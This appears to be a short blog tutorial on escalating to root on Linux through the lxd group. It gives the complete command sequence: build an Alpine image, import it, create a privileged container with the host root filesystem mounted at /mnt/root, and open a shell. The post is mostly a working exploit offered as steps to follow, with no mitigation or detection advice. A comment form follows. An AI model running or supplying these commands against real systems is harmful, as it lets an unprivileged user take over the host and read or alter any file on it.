How To Gain Root Privilege Escalation via LXD

Linux system environments running LXD are vulnerable to privilege escalation via multiple attack paths. Privilege escalation via LXD in general has been a known issue in Ubuntu system with a simple method, the only requirement for this exploit in a Linux system is access to a user account that is a member of the LXD group.

To check if the user is part of LXD group is simply as the command id.

The user is part of LXD group, and the host in this case is running Ubuntu 18.04 which is vulnerable to lxd ( searchsploit lxd ), so we going to download lxd-alpine-builder from here https://github.com/saghul/lxd-alpine-builder.git and follow these steps.

On our machine inside the lxd folder we run:

sudo ./build-alpine

sudo ./build-alpine -h

Then on the host machine we run this:

lxc image import alpine-v3.3-x86_64-20160114_2308.tar.gz –alias myimage

lxc image list

lxc init myimage hacker -c security.privileged=true

lxc config device add hacker mydevice disk source=/ path=/mnt/root recursive=true

lxc start hacker

lxc exec hacker /bin/sh

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s